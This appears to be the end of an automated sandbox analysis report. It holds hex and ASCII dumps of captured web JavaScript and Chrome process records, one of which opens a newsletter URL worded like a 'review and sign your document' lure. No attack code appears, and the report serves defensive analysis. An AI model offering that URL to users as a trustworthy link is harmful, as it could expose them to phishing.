                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 5f 70 6f 73 74 5f 62 61 64 67 65 73 26 26 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 62 2d 32 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 63 2c 7b 74 68 65 6d 65 3a 74 2e 77 65 62 5f 74 68 65 6d 65 2e 63 6f 6e 74 65 6e 74 5f 74 68 65 6d 65 2c 74 65 78 74 3a 64 28 22 70 6f 73 74 73 2e 66 65 61 74 75 72 65 64 22 29 2c 69 63 6f 6e 3a 65 2e 6a 73 78 28 4e 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 7a 2d 31 30 20 68 2d 33 2e 35 20 77 2d 33 2e 35 22 7d 29 7d 29 7d 29 2c 77 26 26 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 28 22 7a 2d 31 30 20 63 6f 6c 2d 73 70 61 6e 2d 31 20 77 2d 66 75 6c 6c 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 72 6f 75 6e 64 65 64 2d 77 74 20 62 6f 72 64 65 72 22 2c
                                                                                                                                            Data Ascii: _post_badges&&e.jsx("div",{className:"mb-2",children:e.jsx(c,{theme:t.web_theme.content_theme,text:d("posts.featured"),icon:e.jsx(N,{className:"z-10 h-3.5 w-3.5"})})}),w&&e.jsx("div",{className:s("z-10 col-span-1 w-full overflow-hidden rounded-wt border",
                                                                                                                                            2025-01-15 18:14:40 UTC179INData Raw: 65 6e 3a 22 20 2f 20 22 7d 29 2c 65 2e 6a 73 78 28 22 74 69 6d 65 22 2c 7b 64 61 74 65 54 69 6d 65 3a 72 2e 6f 76 65 72 72 69 64 65 5f 73 63 68 65 64 75 6c 65 64 5f 61 74 7d 29 5d 7d 29 5d 7d 29 5d 7d 29 7d 3b 65 78 70 6f 72 74 7b 45 20 61 73 20 50 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 44 35 48 71 34 6b 69 7a 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 31 38 61 65 30 38 33 35 2d 33 65 34 30 2d 35 64 64 32 2d 38 31 35 62 2d 33 63 31 31 31 63 34 62 64 33 39 63 0a
                                                                                                                                            Data Ascii: en:" / "}),e.jsx("time",{dateTime:r.override_scheduled_at})]})]})]})};export{E as P};//# sourceMappingURL=index-D5Hq4kiz.js.map//# debugId=18ae0835-3e40-5dd2-815b-3c111c4bd39c


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:13:14:27
                                                                                                                                            Start date:15/01/2025
                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:13:14:27
                                                                                                                                            Start date:15/01/2025
                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1916,i,3467026499799808514,5900654251676485777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:13:14:28
                                                                                                                                            Start date:15/01/2025
                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below"
                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            No disassembly